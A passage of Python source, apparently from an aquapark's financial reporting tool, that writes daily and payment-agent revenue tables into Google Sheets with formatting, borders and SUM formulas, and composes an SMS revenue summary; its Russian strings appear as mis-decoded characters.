for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# SHEET 4
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 5...')
sheetId = 4
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
self.nex_line = 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f'ะัะพะณะพะฒัะน ะพััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 18}})
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f"ะะฐ {self.data_report} {datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%Y')}",
'', '', ]], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': False}})
self.nex_line += 2
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['ะะฐะทะฒะฐะฝะธะต', 'ะะพะปะธัะตััะฒะพ', 'ะกัะผะผะฐ']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 14}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet5_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
for group in self.agentreport_dict_month:
if group == 'ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ':
continue
if group == 'ะะฐัะฐ':
continue
if group == 'ะะต ััะธััะฒะฐัั':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
group,
self.agentreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][1],
self.agentreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True, 'fontSize': 12}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for folder in self.agentreport_dict_month[group]:
if folder == 'ะัะพะณะพ ะฟะพ ะณััะฟะฟะต':
continue
if folder == '':
continue
self.nex_line += 1
if folder is None:
folder_name = 'ะะตะท ะณััะฟะฟะธัะพะฒะบะธ'
else:
folder_name = folder
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
folder_name,
self.agentreport_dict_month[group][folder][0][1],
self.agentreport_dict_month[group][folder][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for servise in self.agentreport_dict_month[group][folder]:
if servise[0] == 'ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
servise[0],
servise[1],
servise[2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': False}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
for j in range(self.sheet5_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
while self.nex_line < self.sheet5_height:
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT',
'textFormat': {'bold': False, 'fontSize': 10}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#ffffff")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet5_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 6
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 6...')
sheetId = 5
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
# ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ั ะดะฐะฝะฝัะผะธ
weekday_rus = [
"ะะพะฝะตะดะตะปัะฝะธะบ",
"ะัะพัะฝะธะบ",
"ะกัะตะดะฐ",
"ะงะตัะฒะตัะณ",
"ะััะฝะธัะฐ",
"ะกัะฑะฑะพัะฐ",
"ะะพัะบัะตัะตะฝัะต",
]
self.nex_line = self.start_line
ss.prepare_setValues(
f"A{self.nex_line}:P{self.nex_line}",
[
[
datetime.strftime(self.finreport_dict_beach['ะะฐัะฐ'][0], '%d.%m.%Y'),
weekday_rus[self.finreport_dict_beach['ะะฐัะฐ'][0].weekday()],
f'=\'ะะปะฐะฝ\'!L{self.nex_line}',
self.finreport_dict_beach['ะัั
ะพะด ั ะฟะปัะถะฐ'][0],
f'=\'ะะปะฐะฝ\'!M{self.nex_line}',
str(self.finreport_dict_beach['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]).replace('.', ','),
self.finreport_dict_beach['ะะตะฟะพะทะธั'][1],
self.finreport_dict_beach['ะะฐััั'][0],
self.finreport_dict_beach['ะะฐััั'][1],
f"=IFERROR(I{self.nex_line}/H{self.nex_line};0)",
self.finreport_dict_beach['ะฃัะปัะณะธ'][0],
self.finreport_dict_beach['ะฃัะปัะณะธ'][1],
f"=IFERROR(L{self.nex_line}/K{self.nex_line};0)",
self.finreport_dict_beach['ะขะพะฒะฐัั'][0],
self.finreport_dict_beach['ะขะพะฒะฐัั'][1],
f"=IFERROR(O{self.nex_line}/N{self.nex_line};0)",
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.nex_line}:P{self.nex_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}, 'horizontalAlignment': 'LEFT'},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.nex_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.nex_line}:P{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet6_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ------------------------------------------- ะะฐะฟะพะปะฝะตะฝะธะต ะะขะะะ --------------------------------------
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ะะขะะะ ะฝะฐ ะปะธััะต 2...')
for i, line_table in enumerate(self.spreadsheet['sheets'][1]['data'][0]['rowData']):
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
# ะัะปะธ ัััะพะบะฐ ะฟะตัะตะฟะธััะฒะฐะตััั - ะธัะพะณะพ ะฝะฐ 1 ะฟะพะท ะฒะฝะธะท, ะตัะปะธ ะฝะพะฒะฐั - ะฝะฐ 2 ะฟะพะท
height_table = i + self.reprint
break
else:
height_table = 4
except KeyError:
pass
ss.prepare_setValues(f"A{height_table}:P{height_table}",
[[f'ะะขะะะ',
"",
f"=SUM(C3:C{height_table - 1})",
f"=SUM(D3:D{height_table - 1})",
f"=SUM(E3:E{height_table - 1})",
f"=SUM(F3:F{height_table - 1})",
f"=SUM(G3:G{height_table - 1})",
f"=SUM(H3:H{height_table - 1})",
f"=SUM(I3:I{height_table - 1})",
f"=IFERROR(ROUND(I{height_table}/H{height_table};2);0)",
f"=SUM(K3:K{height_table - 1})",
f"=SUM(L3:L{height_table - 1})",
f"=IFERROR(ROUND(L{height_table}/K{height_table};2);0)",
f"=SUM(N3:N{height_table - 1})",
f"=SUM(O3:O{height_table - 1})",
f"=IFERROR(ROUND(O{height_table}/N{height_table};2);0)",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 1}:D{height_table + 1}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ััะฐัะธะบ)',
"",
f"=IFERROR('ะะปะฐะฝ'!L{self.sheet2_line};0)",
f"=IFERROR(ROUND(D{height_table}/C{height_table + 1};2);0)",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 2}:D{height_table + 2}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ะดะพั
ะพะด)',
"",
f"=IFERROR('ะะปะฐะฝ'!M{self.sheet2_line};0)",
f"=IFERROR(ROUND(F{height_table}/C{height_table + 2};2);0)",
]],
"ROWS")
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัะฐ ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{height_table}:P{height_table}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table + 1}:D{height_table + 1}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table + 2}:D{height_table + 2}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{height_table}:P{height_table}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table + 1}:D{height_table + 1}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table + 2}:D{height_table + 2}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet6_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
def open_googlesheet(self):
"""
ะัะบััะฒะฐะตั ะฑัะฐัะทะตั ั ัะตะบััะตะน ะณัะณะป-ัะฐะฑะปะธัะตะน
"""
if not self.open_browser:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะบัััะธะต ัะฐะนะปะฐ-ะพััะตัะฐ ะฒ ะฑัะฐัะทะตัะต...')
self.show_dialog_variant(f'ะัะบัััั Google-ะพััะตั?',
'ะัะบัััั Google-ะพััะตั?',
webbrowser.open,
self.spreadsheet['spreadsheetUrl']
)
self.open_browser = True
def sms_report(self):
"""
ะกะพััะฐะฒะปัะตั ัะตะบััะพะฒัั ะฒะตััะธั ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ
:return: str
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพััะฐะฒะปะตะฝะธะต SMS-ะพััะตัะฐ...')
resporse = 'ะััะตั ะฟะพ ะฐะบะฒะฐะฟะฐัะบั ะทะฐ '
if self.finreport_dict['ะะฐัะฐ'][0] == self.finreport_dict['ะะฐัะฐ'][1] - timedelta(1):
resporse += f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%d.%m.%Y")}:\n'
else:
resporse += f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%d.%m.%Y")} - {datetime.strftime(self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1), "%d.%m.%Y")}:\n'
if self.finreport_dict['ะะขะะะ'][1]:
resporse += f'ะัะดะธ - {self.finreport_dict["ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ"][0]};\n'
resporse += f'ะะพ ะฐะบะฒะฐะฟะฐัะบั - {self.finreport_dict["ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ"][1] + self.finreport_dict["ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ"][1]:.2f} โฝ;\n'
resporse += f"ะะพ ะพะฑัะตะฟะธัั - {(self.finreport_dict['ะะฑัะตะฟะธั'][1] + self.finreport_dict['ะกะผะฐะนะป'][1]):.2f} โฝ;\n"
resporse += f'ะขะตัะผะพะทะพะฝะฐ - {self.finreport_dict["ะขะตัะผะพะทะพะฝะฐ"][1] + self.finreport_dict["ะขะตัะผะพะทะพะฝะฐ ะะะ ะ"][1]:.2f} โฝ;\n'
resporse += f'ะัะพัะตะต - {self.finreport_dict["ะัะพัะตะต"][1]:.2f} โฝ;\n'
resporse += f"ะะฑัะฐั ะฟะพ ะะะ ะกั - {self.finreport_dict['ะะขะะะ'][1]:.2f} โฝ;\n"
resporse += f'ONLINE ะฟัะพะดะฐะถะธ - {self.finreport_dict["Online ะัะพะดะฐะถะธ"][1]:.2f} โฝ;\n'
if not re.search(r'ะะพ ะพะฑัะตะฟะธัั', resporse) and self.finreport_dict['ะกะผะฐะนะป'][1]:
resporse += f"ะะพ ะพะฑัะตะฟะธัั - {self.finreport_dict['ะกะผะฐะนะป'][1]:.2f} โฝ;\n"
resporse += f"ะะฑัะฐั ะฟะพ ะะะ ะกั - {self.finreport_dict['ะะขะะะ'][1]:.2f} โฝ;\n"
if self.itog_report_org2['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
# resporse += 'ะััะตั ะฟะพ ะฟะปัะถั ะทะฐ '
# if beach_report['ะะฐัะฐ'][0] + timedelta(1) == beach_report['ะะฐัะฐ'][1]:
# resporse += f'{datetime.strftime(beach_report["ะะฐัะฐ"][0], "%d.%m.%Y")}:\n'
# else:
# resporse += f'{datetime.strftime(beach_report["ะะฐัะฐ"][0], "%d.%m.%Y")} - {datetime.strftime(beach_report["ะะฐัะฐ"][0], "%d.%m.%Y")}:\n'
try:
